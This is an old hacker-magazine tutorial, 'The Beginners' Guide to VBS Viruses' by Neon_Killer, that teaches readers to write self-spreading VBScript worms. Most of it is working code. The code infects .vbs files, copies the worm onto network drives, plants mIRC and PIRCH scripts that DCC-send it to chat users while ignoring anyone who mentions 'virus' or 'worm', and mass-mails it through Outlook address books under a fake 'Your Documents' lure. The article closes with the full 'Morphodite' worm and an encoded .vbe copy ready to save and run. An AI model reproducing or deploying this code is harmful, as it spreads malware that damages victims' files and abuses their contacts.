_________  SWAT MAGAZINE ISSUE THIRTY SEVEN JANUARY   __________
  /         \___________________________________________/          \
 /               The Beginners' Guide to VBS Viruses                \
/                         By Neon_Killer                   v.1.00    \
-----------------------------------------------------------------------

Contents:
        1.a     -       Intro
        1.b     -       Contact

        2.a     -       What is VBS?
        2.b     -       VBS basics
        2.c     -       VBS virus basics

        3.a     -       Infecting Networks
        3.b     -       Infecting MIRC
        3.c     -       Infecting PIRCH
        3.d     -       Outlook [Basic]
        3.e     -       Outlook [Alternative]

        4.a     -       Encryption

        5.a     -       Payloads

        6.a     -       Morphodite
        6.b     -       Final Words

1.a: Intro

        Okay, here is where it all begins, this is the start of my tutorial
on VBS viruses. To tell you the truth, I probably know no more than you do
about the subject and therefor my information should not be taken as the gospel
truth. It's far from it. Infact it really is just the information that I as
a beginner/intermediate VBS virus writer could establish. My assembler skills
are terrible as anyone else will say on my part - but i've been doing Basic
and Visual Basic since time began so these viruses where an obvious step to
begin on, but I warn you, this is not the end of anything for me ( or you ).
This is just the beginning.

1.b: Contact

        There aren't really that many places you can contact me. But you can
try these.
        ICQ# 73643197
        MAIL neon_killer@yahoo.com
        MAIL neon_killer@hotmail.com
        URL  http://www14.brinkster.com/neonkill (give it a month or two to get
started)


2.a: What is VBS?

        VBS or "Visual Basic Scripting" is ( as far as I can see ) just another
extension of HTML ( not unlike Java Script) . This does not however mean that if
a browser supports HTML it will also support VBS, I would say that the majority
of the browsers today and of the future will however support it in one form or
another. As VBScript becomes more and more popular ( as i perceive it will )
the chances are that browser developers will respond to the demands of web
designers and VBScript will become very widely supported. VBS is more useful
to web developers and VXers than HTML because gives easy access to ActiveX.


2.b: VBS basics

        VBS is a Higher Level Language and has a not so distant relative named
Visual Basic, the basic language and sytax are very similar and so anyone who
is a previous user should find this a not too difficult tutorial to learn. For
anyone else I am just going to explain the very basics. To make a script, all
you have to do is open up a good old fashioned text-editor and write your code
into it in normal ascii format. Then you save the file as a ".vbs", then click
on it and the windows scripting host ( I think ?!?!  on a win98+ computer should
run it. If not, don't worry - all you do is write a HTML document and put the
script in between

        '<SCRIPT language="VBScript">' and '</SCRIPT>'

then you click it, your browser (ie. IE) should then run it for you.


2.c: VBS virus basics

        In general, a virus needs a way to spread no matter what language, so
I'm going to outline the most simple way. All you have to do is search for
 a target, then write on to the beginning, middle or end of the file.

        This can be done in many ways, one such example is below.

<Cut Here...>
Dim V, VFile, VCode, HomeCode, MyCode

For Each V in FSO.GetFolder("c:\windows").Files

If FSO.GetExtensionName(V.Name) = "vbs" then
Set VFile = FSO.OpenTextFile(V.Path, ForReading)
VCode = VFile.ReadAll
VFile.Close

Set HomeCode = FSO.OpenTextFile(Wscript.FullName, ForReading)
MyCode = HomeCode.ReadAll
HomeCode.Close

VCode = MyCode & VCode
Set VFile = FSO.OpenTextFile(V.Path,ForWriting,True)
VFile.Write VCode
VFile.close
End If
Next
End Sub
<Cut Here...>

        The above code gets all files with an extension of 'vbs' in the
c:\windows directory and appends itself at the beginning of them. I however
do not like using this way to spread my viruses, I feel that this could be
seen as destructive, and I don't like destructive viruses. It is also very
slow, infact VBS viruses are very slow anyway, this just makes  them even
worse. The above code can also be used to infect other directorys and different
extensions.

        To infect files with other extensions ( such as .ASP, .HTM, .HTML ) you
have toinclude
        the '<SCRIPT ...>' tags at either end.


3.a: Infecting Networks

        A good way to get your file to spread is by giving it the ability to
jump across networked folders and drives. This is a relatively simple feat,
all you need to do is find out what the networked drives and folders are and
then write your file to them. The below code is taken from my vbs.morphodite
virus, it is used to spread my file across networks.

<Cut Here...>
Dim My_Network, Network_Drives, NetCount, NetObject

Set NetObject = CreateObject ("Scripting.FileSystemObject")
Set My_Network = ("Wscript.Network")
Set Network_Drives = My_Network.EnumNetworkDrives

If Network_Drives.Count <> 0 Then
For NetCount = 0 To Network_Drives.Count
If InStr(Network_Drives.Item(NetCount), "\") <> 0 Then
NetObject.CopyFile Wscript.ScriptFullName,
NetObject.BuildPath(Network_Drives.Item(NetCount), "morphodite.V1.00.vbs")
End If
Next
End If
<Cut Here...>


3.b: Infecting MIRC

        MIRC is a well known IRC chat program, for more information visit
www.mirc.com or search on the net. Below is an infection routine that I
probably stole of the internet from somewhere before now. I can't remember
where, but I know that it was used in the notorious "Love Bug" worm and that
I updated it slightly.

<Cut Here...>
Dim FSO, ScrFile, MyIni, Parent, My_Shell, Counter

Set FSO = CreateObject("Scripting.FileSystemObject")
Parent = Wscript.ScriptFullName
FSO.CopyFile Parent, "c:\windows\system\morphodite.V1.00.vbs"

Set MyIni = FSO.OpenTextFile("c:\mirc\mirc.ini", ForAppending, True)
MyIni.WriteLine "[rfiles]"
MyIni.WriteLine "n100=script.ini"
MyIni.Close

Set ScrFile = FSO.OpenTextFile("c:\mirc\script.ini", ForAppending, True)

Do
ScrFile.WriteLine "[script]"
ScrFile.WriteLine "n0;morphodite.V1.00.vbs"
ScrFile.WriteLine "n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }"
ScrFile.WriteLine "n2=/.dcc send $nick c:\WINDOWS\system\morphodite.V1.00.vbs"
ScrFile.WriteLine "n3=}"
ScrFile.WriteLine "n4="
ScrFile.WriteLine "n5=ON 1:PART:#:{ /if ( $nick == $me ) { halt }"
ScrFile.WriteLine "n6=/.dcc send $nick c:\WINDOWS\system\morphodite.V1.00.vbs"
ScrFile.WriteLine "n7=}"
ScrFile.WriteLine "n8="
ScrFile.WriteLine "n9=ON 1:TEXT: *script.ini*:#:/.ignore $nick"
ScrFile.WriteLine "n10=ON 1:TEXT: *script.ini*:?:/.ignore $nick"
ScrFile.WriteLine "n11=ON 1:TEXT: *virus*:#:/.ignore $nick"
ScrFile.WriteLine "n12=ON 1:TEXT: *virus*:?:/.ignore $nick"
ScrFile.WriteLine "n13=ON 1:TEXT: *worm*:#:/.ignore $nick"
ScrFile.WriteLine "n14=ON 1:TEXT: *worm*:?:/.ignore $nick"
ScrFile.WriteLine "n15=ON 1:TEXT: *morphodite*:#:/.ignore $nick"
ScrFile.WriteLine "n16=ON 1:TEXT: *morphodite*:?:/.ignore $nick"
ScrFile.Close

Counter = Counter + 1

Set ScrFile = FSO.OpenTextFile("c:\mirc\remote.ini", ForAppending, True)

Loop Until Counter > 1
<Cut Here...>

        The above routine is rather simple, what it does is this;
        1> It copies the file that the code is currently stored in to
                "c:\windows\system\morphodite.V1.00.vbs"
        2> It opens a text file called "c:\mirc\mirc.ini"
        3> It appends
                "[rfiles]"
                and
                "n100=script.ini"
                to the end of it, then it closes the file.
        4> Then it opens "c:\mirc\script.ini" and after that "c:\mirc\remote.ini"
        5> It writes my script to the end
        6> It closes the files.

        There are a few drawbacks to this method. One is that newer versions
of MIRC by default ignore ".vbs" files so the dcc won't work. Another is that
if the user doesn't have MIRC or has it installed in another directory, the
files are still written and this may cause suspicion. To learn more about the
script, download a version of MIRC and read the help file.


3.c: Infecting PIRCH

        PIRCH is another IRC client, you can search for that on the internet
as well, and probably come up with more information than I will ever be able
to give you. The infection routine should be self explanatory by now, so I'm
just going to add it now and you can work it out for yourself. This routine
was taken directly from my first ( and most probably last ) vbs virus
( morphodite ). It should be attached at the end of this file.

<Cut Here...>
Set ScrFile = FSO.OpenTextFile("c:\windows\events.dll", ForWriting, True)

ScrFile.WriteLine
ScrFile.WriteLine "[Levels]"
ScrFile.WriteLine "Enabled=1"
ScrFile.WriteLine "Count=6"
ScrFile.WriteLine "Level1=000-Unknowns"
ScrFile.WriteLine "000-UnknownsEnabled=1"
ScrFile.WriteLine "Level2=100-Level 100"
ScrFile.WriteLine "100-Level 100Enabled=1"
ScrFile.WriteLine "Level3=200-Level 200"
ScrFile.WriteLine "200-Level 200Enabled=1"
ScrFile.WriteLine "Level4=300-Level 300"
ScrFile.WriteLine "300-Level 300Enabled=1"
ScrFile.WriteLine "Level5=400-Level 400"
ScrFile.WriteLine "400-Level 400Enabled=1"
ScrFile.WriteLine "Level6=500-Level 500"
ScrFile.WriteLine "500-Level 500Enabled=1"
ScrFile.WriteLine ""
ScrFile.WriteLine "[000-Unknowns]"
ScrFile.WriteLine "User1=*!*@*"
ScrFile.WriteLine "UserCount=1"
ScrFile.WriteLine "Event1=;morphodite.V1.00.vbs"
ScrFile.WriteLine "Event2=ON JOIN:#:/dcc send $nick
c:\windows\system\morphodite.V1.00.vbs"
ScrFile.WriteLine "Event2=ON PART:#:/dcc send $nick
c:\windows\system\morphodite.V1.00.vbs"
ScrFile.WriteLine "Event3=VERSION:/notice $nick \-1 pIRCH: Morphodite \-1:-"
ScrFile.WriteLine "Event4=ON TEXT:*morphodite*:#:/kick # $nick"
ScrFile.WriteLine "Event5=ON TEXT:*morphodite*:#:/ignore # $nick"
ScrFile.WriteLine "Event6=ON TEXT:*vbs*:#:/ignore # $nick"
ScrFile.WriteLine "Event7=ON TEXT:*virus*:#:/ignore # $nick"
ScrFile.WriteLine "Event8=ON TEXT:*worm*:#:/ignore # $nick"
ScrFile.WriteLine "EventCount=8"
ScrFile.WriteLine ""
ScrFile.WriteLine "[100-Level 100]"
ScrFile.WriteLine "UserCount=0"
ScrFile.WriteLine "EventCount=0"
ScrFile.WriteLine ""
ScrFile.WriteLine "[200-Level 200]"
ScrFile.WriteLine "UserCount=0"
ScrFile.WriteLine "EventCount=0"
ScrFile.WriteLine ""
ScrFile.WriteLine "[300-Level 300]"
ScrFile.WriteLine "UserCount=0"
ScrFile.WriteLine "EventCount=0"
ScrFile.WriteLine ""
ScrFile.WriteLine "[400-Level 400]"
ScrFile.WriteLine "UserCount=0"
ScrFile.WriteLine "EventCount=0"
ScrFile.WriteLine ""
ScrFile.WriteLine "[500-Level 500]"
ScrFile.WriteLine "UserCount=0"
ScrFile.WriteLine "EventCount=0"
ScrFile.Close

FSO.CopyFile "c:\WINDOWS\events.dll", "c:\pirch32\events.ini"
FSO.CopyFile "c:\WINDOWS\events.dll", "c:\pirch98\events.ini"
<Cut Here...>

        As I said, pretty self-explanatory.


3.d: Outlook [Basic]

        I have found that the majority of vbs worms nowadays use this
method to spread themselves. I believe that it is used because it is
very simple and pretty effective. I originally took this code from the
vbs.cybersex worm, I hope you understand it.

<Cut Here...>
Set Prg = CreateObject("Outlook.Application")
Set Prg1 = Prg.GetNameSpace("MAPI")

For y = 1 To Prg1.AddressLists.Count
Set AdBook = Prg1.AddressLists(y)
x = 1
Set Maie = Prg.CreateItem(0)

For oo = 1 to AdBook.AddressEntries.Count
NewMailAdd = AdBook.AddressEntries(x)
Maie.Recipients.Add NewMailAdd
x = x + 1
Next

Maie.Subject = "Your Documents"
Maie.Body = "Attached is a copy of Morphodite V1.00, hopefully it should be of
some use. It is encrypted for obvious reasons..."
Maie.Attachments.Add "c:\windows\system\morphodite.V1.00.vbs"
Maie.DeleteAfterSubmit = False
Maie.Send
NewMailAdd=""
Next
<Cut Here...>

        I like this method, its very flexible and can be quite convincing,
however I find that fewer and fewer people are stupid enough to open an attachment
that just doesn't quite seem to be right.


3.e: Outlook [Alternative]

        There are many alternative Outlook exploits that can be easily found and
manipulated for use in VBS viruses on the Net, most of them are at
http://www.guninski.com. An example of a virus that uses an alternative Outlook
infection to spread itself is the Kak worm. This can be found at
www.coderz.net/zulu. The site is also good for alternative viruses in general.


4.a: Encryption

        Encryption is very simple in VBS viruses, you don't really have to do
anything much.  Microsoft is kind enough to do it all for you. They created
a rather clever script creator that works in conjunction with Internet
Explorer V5+, just read the well written help manual and encrypt your file.
Then add it as shown and remember that you must change any reference from
.vbs to .vbe. Easy as pie! You can download the file from Microsoft.
I can't remember exactly where, if enough people bug me, i'll put it up on my
site, however just search on www.Microsoft.com for "screnc" and you should be
able to find it.


5.a: Payloads

        Payloads are the interesting bit of the virus, there's absolutely no
point in just having your virus pop up a message box on a certain day, why
bother? This just makes your virus boring and uninteresting. A waste of time,
especially when all you have to do to look for a good payload is search for
free VBS source code sites and slightly manipulate the code you find. You can
look for simple VB games and then change them into VBS, you can use ActiveX
controls, you can do a whole world of interesting payloads, but many people
choose to just pop up a message box. How Dull! I think that if you just want
a message box, you're better off putting a comment into your source code and
leaving the message box out all together, it makes your virus much stealthier.


6.a: Morphodite

        Morphodite is the first virus that i ever wrote using VBS. It isn't
actually Polymorphic, as the name suggests, it is encrypted using the above
mentioned Microsoft program however. I called it Morphodite because I
originally intended it to be Polymorphic and because I read the word in a
book. Anyone who can mail me the title of the book gets a prize! ( lol )

<Cut Here...>
Call Morphodite

Private Sub Morphodite ()

On Error Resume Next

Const ForReading = 1, ForWriting = 2, ForAppending = 8

Dim FSO, ScrFile, MyIni, Parent, My_Shell

Set My_Shell = Wscript.CreateObject("Wscript.Shell")
Profile =
My_Shell.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Morphodite")
If Profile <> "" Then Exit Sub

Dim My_Network, Network_Drives, NetCount, NetObject

Set NetObject = CreateObject ("Scripting.FileSystemObject")
Set My_Network = ("Wscript.Network")
Set Network_Drives = My_Network.EnumNetworkDrives

If Network_Drives.Count <> 0 Then
For NetCount = 0 To Network_Drives.Count
If InStr(Network_Drives.Item(NetCount), "\") <> 0 Then
NetObject.CopyFile Wscript.ScriptFullName,
NetObject.BuildPath(Network_Drives.Item(NetCount), "morphodite.V1.00.vbe")
End If
Next
End If

Set FSO = CreateObject("Scripting.FileSystemObject")
Parent = Wscript.ScriptFullName
FSO.CopyFile Parent, "c:\windows\system\morphodite.V1.00.vbe"

Set MyIni = FSO.OpenTextFile("c:\mirc\mirc.ini", ForAppending, True)
        MyIni.WriteLine "[rfiles]"
        MyIni.WriteLine "n100=script.ini"
        MyIni.Close

Dim Counter


Set ScrFile = FSO.OpenTextFile("c:\mirc\script.ini", ForAppending, True)

Do
        ScrFile.WriteLine "[script]"
        ScrFile.WriteLine "n0;Morphdite"
        ScrFile.WriteLine "n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }"
        ScrFile.WriteLine "n2=/.dcc send $nick
c:\WINDOWS\system\morphodite.V1.00.vbe"
        ScrFile.WriteLine "n3=}"
        ScrFile.WriteLine "n4="
        ScrFile.WriteLine "n5=ON 1:PART:#:{ /if ( $nick == $me ) { halt }"
        ScrFile.WriteLine "n6=/.dcc send $nick
c:\WINDOWS\system\morphodite.V1.00.vbe"
        ScrFile.WriteLine "n7=}"
        ScrFile.WriteLine "n8="
        ScrFile.WriteLine "n9=ON 1:TEXT: *script.ini*:#:/.ignore $nick"
        ScrFile.WriteLine "n10=ON 1:TEXT: *script.ini*:?:/.ignore $nick"
        ScrFile.WriteLine "n11=ON 1:TEXT: *virus*:#:/.ignore $nick"
        ScrFile.WriteLine "n12=ON 1:TEXT: *virus*:?:/.ignore $nick"
        ScrFile.WriteLine "n13=ON 1:TEXT: *worm*:#:/.ignore $nick"
        ScrFile.WriteLine "n14=ON 1:TEXT: *worm*:?:/.ignore $nick"
        ScrFile.WriteLine "n15=ON 1:TEXT: *morphodite*:#:/.ignore $nick"
        ScrFile.WriteLine "n16=ON 1:TEXT: *morphodite*:?:/.ignore $nick"
        ScrFile.Close
        Counter = Counter + 1

Set ScrFile = FSO.OpenTextFile("c:\mirc\remote.ini", ForAppending, True)

Loop Until Counter > 1

Set ScrFile = FSO.OpenTextFile("c:\windows\events.dll", ForWriting, True)

ScrFile.WriteLine
ScrFile.WriteLine "[Levels]"
ScrFile.WriteLine "Enabled=1"
ScrFile.WriteLine "Count=6"
ScrFile.WriteLine "Level1=000-Unknowns"
ScrFile.WriteLine "000-UnknownsEnabled=1"
ScrFile.WriteLine "Level2=100-Level 100"
ScrFile.WriteLine "100-Level 100Enabled=1"
ScrFile.WriteLine "Level3=200-Level 200"
ScrFile.WriteLine "200-Level 200Enabled=1"
ScrFile.WriteLine "Level4=300-Level 300"
ScrFile.WriteLine "300-Level 300Enabled=1"
ScrFile.WriteLine "Level5=400-Level 400"
ScrFile.WriteLine "400-Level 400Enabled=1"
ScrFile.WriteLine "Level6=500-Level 500"
ScrFile.WriteLine "500-Level 500Enabled=1"
ScrFile.WriteLine ""
ScrFile.WriteLine "[000-Unknowns]"
ScrFile.WriteLine "User1=*!*@*"
ScrFile.WriteLine "UserCount=1"
ScrFile.WriteLine "Event1=;morphodite.V1.00.vbe"
ScrFile.WriteLine "Event2=ON JOIN:#:/dcc send $nick
c:\windows\system\morphodite.V1.00.vbe"
ScrFile.WriteLine "Event2=ON PART:#:/dcc send $nick
c:\windows\system\morphodite.V1.00.vbe"
ScrFile.WriteLine "Event3=VERSION:/notice $nick \-1 pIRCH: Morphodite \-1:-"
ScrFile.WriteLine "Event4=ON TEXT:*morphodite*:#:/kick # $nick"
ScrFile.WriteLine "Event5=ON TEXT:*morphodite*:#:/ignore # $nick"
ScrFile.WriteLine "Event6=ON TEXT:*vbs*:#:/ignore # $nick"
ScrFile.WriteLine "Event7=ON TEXT:*virus*:#:/ignore # $nick"
ScrFile.WriteLine "Event8=ON TEXT:*worm*:#:/ignore # $nick"
ScrFile.WriteLine "EventCount=8"
ScrFile.WriteLine ""
ScrFile.WriteLine "[100-Level 100]"
ScrFile.WriteLine "UserCount=0"
ScrFile.WriteLine "EventCount=0"
ScrFile.WriteLine ""
ScrFile.WriteLine "[200-Level 200]"
ScrFile.WriteLine "UserCount=0"
ScrFile.WriteLine "EventCount=0"
ScrFile.WriteLine ""
ScrFile.WriteLine "[300-Level 300]"
ScrFile.WriteLine "UserCount=0"
ScrFile.WriteLine "EventCount=0"
ScrFile.WriteLine ""
ScrFile.WriteLine "[400-Level 400]"
ScrFile.WriteLine "UserCount=0"
ScrFile.WriteLine "EventCount=0"
ScrFile.WriteLine ""
ScrFile.WriteLine "[500-Level 500]"
ScrFile.WriteLine "UserCount=0"
ScrFile.WriteLine "EventCount=0"
ScrFile.Close

FSO.CopyFile "c:\WINDOWS\events.dll", "c:\pirch32\events.ini"
FSO.CopyFile "c:\WINDOWS\events.dll", "c:\pirch98\events.ini"

Set Prg = CreateObject("Outlook.Application")
Set Prg1 = Prg.GetNameSpace("MAPI")

For y = 1 To Prg1.AddressLists.Count
Set AdBook = Prg1.AddressLists(y)
x = 1
Set Maie = Prg.CreateItem(0)

                For oo = 1 to AdBook.AddressEntries.Count
                NewMailAdd = AdBook.AddressEntries(x)
                Maie.Recipients.Add NewMailAdd
                x = x + 1
                Next

Maie.Subject = "Your Documents"
Maie.Body = "Attached is a copy of the file you requested, hopefully it should
be of some use. It is encrypted for obvious reasons..."
Maie.Attachments.Add "c:\windows\system\morphodite.V1.00.vbe"
Maie.DeleteAfterSubmit = False
Maie.Send
NewMailAdd=""
Next

Set My_Shell = Wscript.CreateObject("Wscript.Shell")
Profile =
My_Shell.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Morphodite")
If Profile = "" Then
My_Shell.RegWrite
"HKCU\Software\Microsoft\Windows\CurrentVersion\Morphodite", "1"
End If

End Sub

<Cut Here...>

        The above piece of code should be saved as "morphodite.vbs" and then
encrypted to "morphodite.vbe". Below is the encrypted code that can be copied
straight into an ascii text file ( just a normal text document ) and then saved
as morphodite.vbe.

<Cut Here...>
#@~^9xYAAA==/mVs,HKDw4W9rY@#@&@#@&n.r7lY~?!4PtG.w4W9kO+~c*@#@&@#@&6x,2..KDP]nkEh+,H6O@#@&@#@&ZKxkOPwW.Il[r
oP{~FBPsK.      DbYbxLPx~y~~sK.bawnU9kxL~{P0@#@&@#@&frsPw?rBPU^Dwks+BP\z&xkB~nmD+
OSPtX|?4+ss@#@&@#@&UnY,HzmUt+ss,'~k^Mk2DR;D+mY64N+^YvJ
d1DkaORUt+^sE#@#@&hDG0rsPxP@#@&HH{j4VV
]o]+m[vJunZ`-?K0DAlM+wHbm.GkW0DwbxNKAd-;EMDnxO#DdkKU-tW.24WNrOJb@#@&(6PKMW6kVP@!@*PrJ~K4+U~A6kD~?!4@#@&@#@&fb:,Hz{HnDhGD0SPg+OAKD3m9Mk-+kS,1nDZKExD~,H+Dr8LmO@#@&@#@&UnY,1+D68LmDPxP/.lO+}8LmO~vJ?^.bwOk
Lcsr^+UX/D+s64N+^Yr#@#@&U+Y,\X|1+DAGD0P{PcJ     d1DrwD
1YAGM3Jb@#@&?nY,HYAKD0{fMk7n/,'~HH{HnDhWMVRAxEsHnYSWM39Dr-/@#@&@#@&q6PHnDhW.V|f.k7nkR/KE
YP@!@*,TP:tnx@#@&oGMP1OZKExD~xPZP:W~1nOSW.3|9Db\ndcZW;UD@#@&q6~&xjDDv1+DhK.3|f.k7+d
&Y+sc1YZK;UY*~,JwJb~@!@*~!,Ptx@#@&g+Y68N+^Yc/Kwzwk^+Pq/1.kaY
?1Dr2DsE^s1m:+B~@#@&g+Dr8Ln^DR$EbsNhlO4v1+OAKDV{G.b\nkR&Y+s`gnY;W;xD#S~r:WM2tKNkDn
.8RZ!
\8nr#@#@&AUN,qW@#@&1+aO@#@&3x9~&0@#@&@#@&?+DPwjr,'~ZM+COr4NnmD`JU^.kaYbxLRor^+jXkO+sr8%mYEb@#@&KlMn
Y~{Pq/mMkaORUm.kaYo;^V1mh+@#@&sU6 ZKwHsrVn~hl.+ O~,J^l'hkU[Khd-kzkYns-sWDatK[kD+
.8RTTc\4E@#@&@#@&UnOPtX&xrPx~w?6R}2+   KnaDsksnvJ^)'hbD^':bDmck
rJBPoWMb22xNbUoBPKM;n#@#@&iHzqUrc.kDnSbxn~r$DWr^+dTr@#@&d\Hq
kRqDbO+dkU+,JUqZ!'k^DbwYcrUkr@#@&d\X(UbR/VKd+@#@&@#@&Gk:~/KEUY.@#@&@#@&@#@&?+DPU^Dwks+,'~oUrR}2+
K+XOok^+vJ^)whbD^-k^DbwO bxkES,sGDz2a+U9k       o~,KM;+*@#@&@#@&fG@#@&d?1.sbV+c
.kD+dkU+~E]/^Db2YYJ@#@&i?m.obVnRq.bYndk +PrxZIHKD2t9kOnr@#@&ijmMsk^n
MkD+JkUn,JUF{61,FlB}q1l:=      ~zbW,`~fxbm3,'{~^s+~#,  ~4mVY,NJ@#@&P,~~P,P,?^Dor^+
MrYSrUPJU+{z N1^,/n  N,^xbm0~m=-     qgf6    U-/HdY:-sG.w4W9kO+
#8RT!c-4J@#@&i?m.obVnRq.bYndk  +Prx2x8r@#@&dUm.obV+c   DbY+drU+,J      cxJ@#@&i?^DwrVR
.bY+Jr  +~J     X{rH,F=nb"K=:)PP&k6Pc~fxk1VP{'PfhnP*PPP4lsO,8E@#@&~P,P~~,P?^.wks+c
MkOSbx+,J      'JR[m1Pdn      NPfUk13P1lw&1Gr
?wdH/O+sw:KD24KNkOnc.qRZTc\8J@#@&dUmMok^+ MkOndkx~J
G')E@#@&i?1Doksnc.kDnSbxn~rx%xE@#@&7?1.wksRqDkD+drxPExO'6H,F):3(:)PCd^DbwDRrxrM=alzcro
W.n,^xr^0J@#@&ij1DobVRMkDnSbxnPrxqT{r1,q):2(:l~ekmMk2Y r      kM)QlzckLUKD+~y
k^3r@#@&dj1DwkVRq.kD+Jk        +~E     FF{61,F):3pK=PC\rD;dC):)J
kTxG.P^Ur13E@#@&7Um.wk^+RqDbO+dkU+,JUqy'rg~F=K2oPlPC\bD;/MlQ)&RbLxKDn~fxk^Vr@#@&dU^Msr^+cDbYJk
+~J     Ffx}1P8lKA(K=~MhKDselal&ckLxK.+,^Ur13J@#@&i?^Dwr^+ qDbY+dk
nPrxqc{rH~8)KApK=PeSG.:C)Q)&RrL W.+,yxbmVE@#@&dj^MsrV
qDrD+dkxPrUFl'61,FlPA(K=~esWDa4GNbYelal&ckLxK.+,^Ur13J@#@&i?^Dwr^+ qDbY+dk
nPrxqv{rH~8)KApK=PesG.w4W9kO+MlQ)&RbLxKDn~fxk^Vr@#@&dU^Msr^+cZVK/@#@&iZGE
Yn.,'P;GE       Y+M~QP8@#@&@#@&?nO,?^DwrVPx~w?r
6a+UKaDsr^+vJm=-srD1-.+sWOnckxbE~,sWM)2wx9kUoS~:D;+*@#@&@#@&JGKwPiUDksP;G!xOD,@*P8@#@&@#@&U+OPUm.obV+,xPw?rc62+
K6Osrs`Em=whbx[GS/-n-xO/c[^VEBPwWDqDbOk
oSP:D;n*@#@&@#@&?1DsbsnRqDbYnSrU@#@&?1.sbVn qDkOndkU+,E]Sn7+^/Tr@#@&jmMsrVR
.bY+drxPJAUC4^+9'qJ@#@&Um.sbs+c.rD+SrUPEZK;  Yx+J@#@&?1DwrVR
DbYnJbx+,ES\+^qx!Z! jU3UGSxdJ@#@&?1Dor^+R      .bYnSbUPEZ!ZOj 3       Gh
/3xm4sn9'Fr@#@&UmDwrs+cMkO+Jr
+~Jdn\V+x8!!RJ\nV,qZ!E@#@&UmDwk^nRqDrYSrUPJ8T!
S+7nsP8!Z2Ul8sNxFr@#@&Um.obV+  MkO+dr
+~rS\+^&{+!ZOJ+7+s~y!!r@#@&UmDwrs+cMkO+Jr     +~JyT!
Sn-VP+TZ2Ul(sNx8J@#@&?1DwrVR DbYnJbx+,ES\+^*x&Z! Sn\ns,&T!r@#@&Um.obV+ 
MkO+dr  +~r&Z!Od+7nV,&T!AxC8^+N{qJ@#@&?1.ok^+c.kOndkU+,ES\nsl'cTT
Sn\s,cTZJ@#@&?1DwrVR
DbYnJbx+,EcZ!Odn-+^PW!T2UC(VnN{qJ@#@&j^Msksnc.kDndkUPrS+7+^'l!TOd+-n^P*ZTJ@#@&?1.ok^+c.kOndkU+,E*Z!RJ\+s~l!T2
C(Vn9'8J@#@&?1.sbVnRqDrOSk     nPrJ@#@&j^Dwk^+ .rD+Jk nPr$TTZOjUV
WAxkDr@#@&UmMsk^+c      DbYnSbxn~rj/.F{e"C@$MJ@#@&Um.srsR     DbO+dkUn,JjdnMZGE
O{FE@#@&UmDwk^nRqDrYSrUPJA-+  YF{IhWMw4W[kOnc.qRZTR74nE@#@&?^.wks+c
MkOSbx+,JA-+   Y+'}1~B}q1=:)JNm1~d+
N,^Uk^V,ml-Srx9WAd'/XdO:w:K.atG9kD+RjFcT!c\8+r@#@&j1Dsbs+cDbOnSbxPE2-n
Y+'}HPhb]P=a)&[1m~/U9Py        k13P1)'Ak       NGhk-dzkY+sw:KDw4G[kD+c.qRTTc\8+r@#@&Um.obV+ 
MkO+dr  +~r27+xD&{#2"?(rg)&UKYk1nPfxk1V~-
F,w(I/u=P\WM2tKNrOP-Rq=OE@#@&j1DobVRMkDnSbxnPr2-n
Yc{61,K2oPlesWMw4W[rD+M)[lz0k^V,aPyUbmVJ@#@&Um.wk^+RqDbO+dkU+,J3-xYlxrgPKApP)C:KD2tG[bYne=:)JkLUKD+~:,^Uk1Vr@#@&UmMsk^+c
DbYnSbxn~r2\UY+'rg~P2oK=e-4dM=alzbLxKDn~[P^Ur13E@#@&j1DobVRMkDnSbxnPr2-n
YG{61,K2oPle7kMEdel:=zro
GDP:~fxk^Vr@#@&?1.wksRqDkD+drxPE27+UOR'rg~KA(K=MAWM:C):)&rTxGD~a,^Ur13J@#@&Um.sbsR
MkD+Sbx~JA\nxDZG;      Y'RE@#@&?mMorVRqDrYnJbxnPrE@#@&?^.wkVn
qDrYJbxn,J]F!ZOdn\V~FZ!DE@#@&?1.sbV+c .kD+dkU+~E`/nD;GE       YxTr@#@&j^MsrV
qDrD+dkxPr3\xOZKEUO{!J@#@&?1DsbsnRqDbYnSrUPEJ@#@&?1Dor^+R    .bYnSbUPE]
Z!Od+7nV, T!YJ@#@&UmDwrVRMrO+dk       +~JidD/W!UY{!E@#@&?m.obVnRq.bYndk      +Pr27nxDZGE
YxTr@#@&U^DwkV         DbYSrxn~rJ@#@&U^DwksncDrOSrx~r$fZ!
S+7+^~&Z!DJ@#@&j^Msk^nRqDkDnJk  +,Ji/n.;W;xDx!r@#@&j1DsrsR     DbOSr  +,J27+
OZKEUY{!E@#@&?mMok^+Rq.rYSbxnPEE@#@&jmMok^+    MkYnJbxnPr,W!T
S\+^PWT!YJ@#@&Um.obV+c DbY+drU+,J`/nD/G!xO'ZE@#@&?^.wkVn qDrYJbxn,JA\+        Y;GE
Yx!r@#@&j1Dsbs+cDbOnSbxPEJ@#@&Um.sbs+c.rD+SrUPE$lTZOJ\VPl!ZDJ@#@&jmMsrsRMrYSk
n~J`/D/W;UD'TJ@#@&?1Dor^+R     .bYnSbUPEA\xY;W!UY{!E@#@&?^.wkV Z^W/@#@&@#@&sUr
ZG2HsrV~J1)w   &1f6    U-n\UD/ 9V^J~,J1l-ak.m4&+w\+  O/ckxbE@#@&w?}R/W2zwks+,Em=-
(gfr    j'+-+
OkR[^Vr~Prm=wwbD^tO%wn7+xDdRbxkr@#@&@#@&?Y~n.L,'~ZMnlD+68N+mOcrr;Y^GK3
zwaVk1lDrW      Jb@#@&?nO,nDTqP{PnML
MYglh+j2mmn`r\bhqEb@#@&@#@&oKD~X,x,F~:W,nDTFc)N9Dn/kSrdD/R;GE
Y@#@&jnY,b9AGWV~{PKDTqRzN[.//JrkYd`Hb@#@&a,',F@#@&?OPtlr+,'~KMoR;.+mY+&On:v!*@#@&@#@&7isGD,GW,'~q,YW~)9AGW0
zN[M+k/2
YMr+kR/W!xO@#@&ddgnhtlk^)[N,',b[AGG0R)N9.+k/3UDDkndv6b@#@&7iHCb+cI+1kar+
YdRzN[~g+htCk^bN9@#@&di6,'~6~Q,F@#@&i716O@#@&@#@&\Cb+
?!8N+^DP{PJIW!.PGW^Es+UOkJ@#@&\lb+R~G[X,',J)YOC1tnN,r/,l~^KwX~G6POt~6ksPHWE,D5E/O+9~~4Kw+6;V^XPbO~/4W!V[P8n,WWPkG:P;dRP(O,kdPU1DzaYNP6WM~W(\rW!/~.l/KU/cRRr@#@&HmkR)YOC1th+
O/cb[[,JmlwSkUNKAk-dH/D+:':K.w4W[kD+ #8R!Z
